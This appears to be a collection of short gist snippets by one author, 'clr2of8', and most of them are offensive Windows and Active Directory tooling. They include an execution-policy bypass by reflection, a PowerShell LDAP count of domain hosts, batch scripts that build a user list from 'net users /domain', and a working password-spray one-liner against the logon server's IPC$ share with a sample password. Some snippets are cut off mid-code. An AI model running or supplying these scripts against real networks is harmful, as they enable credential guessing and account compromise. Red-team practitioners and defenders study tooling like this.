clr2of8

powershell -ep bypass -command "$s=gwmi Win32_ComputerSystem; if (-not $s.PartOfDomain) { $n=-1 } else { $dr='LDAP://';$s.Domain.Split('.') | % { $dr+='DC='+$_+',' }; $dr=$dr.TrimEnd(','); try { $ad=New-Object DirectoryServices.DirectorySearcher(([adsi]$dr),'(objectCategory=computer)',('name')); $n=($ad.FindAll()).Count } catch { $n=-2} };write-host " Hosts count: " $n; "

clr2of8

# from https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/
function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))}
Disable-ExecutionPolicy

clr2of8

echo "Bits Job Executed" > %HOMEPATH%\Desktop\bitsjob.txt

clr2of8

Add-Content $env:USERPROFILE\desktop\bitsjob.txt "Bits job executed"

clr2of8

{
	"name": "AzureCloudBrainStorming",
	"version": "3.0",
	"domain": "mitre-enterprise",
	"description": "",
	"filters": {
		"stages": [
			"act"
		],
		"platforms": [

clr2of8

function setKey($registryPath, $Name, $Value, $Type="DWORD") {

    IF(!(Test-Path $registryPath))
    {

        New-Item -Path $registryPath -Force | Out-Null
         
        New-ItemProperty -Path $registryPath -Name $Name -Value $value -PropertyType $Type -Force | Out-Null
     }

clr2of8

rem Create the users.txt by parsing the "net users /domain" output
del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1
@FOR /F "skip=6 delims=" %a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%a & @call echo %^line:  =,%  >> %temp%\1.txt
@FOR /F "delims=" %a in (%temp%\1.txt) do @set line=%a & @call echo %^line:, =,% >> %temp%\2.txt
@FOR /F "tokens=1-3 delims=," %n in (%temp%\2.txt) do @echo %n >> %temp%\3.txt & @echo %o >> %temp%\3.txt & @echo %p >> %temp%\3.txt
@FOR /F "tokens=*" %a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %a >> %temp%\users.txt
rem Reset the command window title so you can see the progress of the password spray in the title
title Command Prompt
rem Set your password for the spray here
set password=Spring2020

clr2of8

del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1
@FOR /F "skip=6 delims=" %a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%a & @call echo %^line:  =,%  >> %temp%\1.txt
@FOR /F "delims=" %a in (%temp%\1.txt) do @set line=%a & @call echo %^line:, =,% >> %temp%\2.txt
@FOR /F "tokens=1-3 delims=," %n in (%temp%\2.txt) do @echo %n >> %temp%\3.txt & @echo %o >> %temp%\3.txt & @echo %p >> %temp%\3.txt
@FOR /F "tokens=*" %a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %a >> %temp%\users.txt

clr2of8

SETLOCAL EnableDelayedExpansion
del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1
@FOR /F "skip=6 delims=" %%a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%%a & @call echo %%line:  =,%%  >> %temp%\1.txt
@FOR /F "delims=" %%a in (%temp%\1.txt) do @set line=%%a & @call echo %%line:, =,%% >> %temp%\2.txt
@FOR /F "tokens=1-3 delims=," %%n in (%temp%\2.txt) do @echo %%n >> %temp%\3.txt & @echo %%o >> %temp%\3.txt & @echo %%p >> %temp%\3.txt
@FOR /F "tokens=*" %%a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %%a >> %temp%\users.txt

clr2of8

@FOR /F "delims=" %p in (pass.txt) DO @FOR /F "delims=" %n in (users.txt) DO @net use %logonserver%\IPC$ /user:"%userdomain%\%n" "%p" 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete %logonserver%\IPC$ > NUL